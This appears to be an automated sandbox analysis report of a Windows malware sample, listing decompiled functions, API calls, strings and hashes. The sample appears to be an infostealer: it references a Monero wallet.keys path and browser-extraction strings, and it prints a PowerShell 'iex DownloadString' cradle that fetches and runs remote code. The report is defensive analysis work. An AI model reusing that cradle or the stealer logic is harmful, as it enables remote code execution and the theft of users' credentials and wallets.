                                • Instruction ID: 36d45ec60bf6565c869d677236bdda0ebc08d8ea0ee37e08f34b2b38c0b06608
                                • Opcode Fuzzy Hash: a798eef28ea36acac72eb6263fcc36ecbcc78d658a14db500af3b36bfb92d211
                                • Instruction Fuzzy Hash: 10F05E30904209EFD348DFE2E90972C7BB0FB45703F0801AAE60DA6290D7744B82DB97
                                Function 00C34FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C34FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C34FD1
                                • InternetOpenA.WININET(00C50DDF,00000000,00000000,00000000,00000000), ref: 00C34FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C35011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C35041
                                • InternetCloseHandle.WININET(?), ref: 00C350B9
                                • InternetCloseHandle.WININET(?), ref: 00C350C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 1e2452d0339131d96abd6afde1643f0b014e20080276550cc1982bf6ec5f5be8
                                • Instruction ID: 0f997009530a2482c9f1071041097192e9232bdf0665efb7efae51786b6a312a
                                • Opcode Fuzzy Hash: 1e2452d0339131d96abd6afde1643f0b014e20080276550cc1982bf6ec5f5be8
                                • Instruction Fuzzy Hash: CE31F5B4A40218ABDB24CF54DD85BDCB7B8FB48704F1081E9EA09B7281C7706EC58F99
                                Function 00C483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C48426
                                • wsprintfA.USER32 ref: 00C48459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C4847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C4848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C48499
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,019FEB38,00000000,000F003F,?,00000400), ref: 00C484EC
                                • lstrlen.KERNEL32(?), ref: 00C48501
                                • RegQueryValueExA.ADVAPI32(00000000,019FE940,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C50B34), ref: 00C48599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C48608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C4861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 3e4c7e5d87ced2a1042668bddd2ac24e4e58ef30c56f4adbf2846f272d1ad2c0
                                • Instruction ID: 9823a43bce2bd91a81506328f1d926e1780fa482bee368e097246b3c40bf866e
                                • Opcode Fuzzy Hash: 3e4c7e5d87ced2a1042668bddd2ac24e4e58ef30c56f4adbf2846f272d1ad2c0
                                • Instruction Fuzzy Hash: B5210A719002189FDB64DB54DC85FE9B3B8FB48700F04C1A8E609A6180DF716AC9CFD5
                                Function 00C47690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C476A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C476AB
                                • RegOpenKeyExA.ADVAPI32(80000002,019EBC58,00000000,00020119,00000000), ref: 00C476DD
                                • RegQueryValueExA.ADVAPI32(00000000,019FEB20,00000000,00000000,?,000000FF), ref: 00C476FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C47708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: f3dc009c368efd62b825e729980adc737047c58ff353db2ff5181bbc76cbe969
                                • Instruction ID: a110b61d471dee19dffd231d9fa031bf373940aae3c8c09fcb47d471dd02277e
                                • Opcode Fuzzy Hash: f3dc009c368efd62b825e729980adc737047c58ff353db2ff5181bbc76cbe969
                                • Instruction Fuzzy Hash: 1B01A7B4A00204BFEB04DBE1DC4DF6D77B8EB84701F144164FA08E7291D77099488B52
                                Function 00C47720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C4773B
                                • RegOpenKeyExA.ADVAPI32(80000002,019EBC58,00000000,00020119,00C476B9), ref: 00C4775B
                                • RegQueryValueExA.ADVAPI32(00C476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C4777A
                                • RegCloseKey.ADVAPI32(00C476B9), ref: 00C47784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 98d6726c408a583ea425bb905b240fc89791585d775d11bfa96bcf728019922a
                                • Instruction ID: 4237b3bcbb2dde81ed98244de9fa2fe89684e6cc0aefac42e7ffb4c64e0123b2
                                • Opcode Fuzzy Hash: 98d6726c408a583ea425bb905b240fc89791585d775d11bfa96bcf728019922a
                                • Instruction Fuzzy Hash: 280144B5A40308BFE714DBE1DC4AFAEB7B8EB44701F144565FA09A7281D67056448B52
                                Function 00C440B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00C440D5
                                • RegOpenKeyExA.ADVAPI32(80000001,019FDEE0,00000000,00020119,?), ref: 00C440F4
                                • RegQueryValueExA.ADVAPI32(?,019FEBC8,00000000,00000000,00000000,000000FF), ref: 00C44118
                                • RegCloseKey.ADVAPI32(?), ref: 00C44122
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44147
                                • lstrcat.KERNEL32(?,019FEDC0), ref: 00C4415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: 3ecbaffbe4551e526c473717ac0dd4d14a06eda0be06cbdc5262610a81280502
                                • Instruction ID: fe2b4e4b4737d46f42a50610ca16fe18ca494ac8b76d27fe4613d7a4ae8fd9c5
                                • Opcode Fuzzy Hash: 3ecbaffbe4551e526c473717ac0dd4d14a06eda0be06cbdc5262610a81280502
                                • Instruction Fuzzy Hash: D24165B6910108AFDB14FBA0DC46FFE737DBBC8300F444558BA1A96181EA755B8C9B92
                                Function 00C399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                • LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 335eee0acaed992b23f2afe4dac044ea7638a4e986624f3153d02d6b741a13b4
                                • Instruction ID: 0863342ab00790bbe079c8ef6947ff40a457b4fbdd3ded9186e4bdda3083aca4
                                • Opcode Fuzzy Hash: 335eee0acaed992b23f2afe4dac044ea7638a4e986624f3153d02d6b741a13b4
                                • Instruction Fuzzy Hash: 3E316D74A00209EFDB14DF95D885BAE77B5FF88300F108258E915A7290C774AA85DFA1
                                Function 00C4C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: 74f68d21747ff6d6971bf21fe47a96fc04d0ca57730b402c11e79f6120fb0ff3
                                • Instruction ID: 05e27f5220356611a1ffd869cca9315a894f5a7fc5e64b2bfd8174a6217af497
                                • Opcode Fuzzy Hash: 74f68d21747ff6d6971bf21fe47a96fc04d0ca57730b402c11e79f6120fb0ff3
                                • Instruction Fuzzy Hash: 674106B150179CAEDB218B24CCC4FFBBBE8BF55704F1444E8E99A86192E2719B45DF20
                                Function 00C44780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,019FEB68), ref: 00C447DB
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44801
                                • lstrcat.KERNEL32(?,?), ref: 00C44820
                                • lstrcat.KERNEL32(?,?), ref: 00C44834
                                • lstrcat.KERNEL32(?,019EA7A8), ref: 00C44847
                                • lstrcat.KERNEL32(?,?), ref: 00C4485B
                                • lstrcat.KERNEL32(?,019FDDC0), ref: 00C4486F
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C48D90: GetFileAttributesA.KERNEL32(00000000,?,00C31B54,?,?,00C5564C,?,?,00C50E1F), ref: 00C48D9F
                                  • Part of subcall function 00C44570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C44580
                                  • Part of subcall function 00C44570: RtlAllocateHeap.NTDLL(00000000), ref: 00C44587
                                  • Part of subcall function 00C44570: wsprintfA.USER32 ref: 00C445A6
                                  • Part of subcall function 00C44570: FindFirstFileA.KERNEL32(?,?), ref: 00C445BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: c0bb86bb43a9afb980b20b292558d8e938d732ee7c711599f681a8297713ed11
                                • Instruction ID: 3f49a63a5bbfa89121954b00da500d256c592ecf47b88042986d5367745f69d9
                                • Opcode Fuzzy Hash: c0bb86bb43a9afb980b20b292558d8e938d732ee7c711599f681a8297713ed11
                                • Instruction Fuzzy Hash: 003171B29002086BDB14FBB0DC86EED737CBB58700F444599B319A6081EE7497CDDB92
                                Function 00C42C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C42D85
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C42CC4
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C42D04
                                • ')", xrefs: 00C42CB3
                                • <, xrefs: 00C42D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 1627c5fa34456e7e1bc6e31d97e8366d35d1fc20d408622ad43b0ac45bd59360
                                • Instruction ID: c04cc2160377460386b987b843223b78a56b9f87be3c614019101501125faada
                                • Opcode Fuzzy Hash: 1627c5fa34456e7e1bc6e31d97e8366d35d1fc20d408622ad43b0ac45bd59360
                                • Instruction Fuzzy Hash: B841DD71C502089AEB14FFA1C892BEDBB74FF14304F504129F416A61D2DF746A8AEF95
                                Function 00C39E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C39F41
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
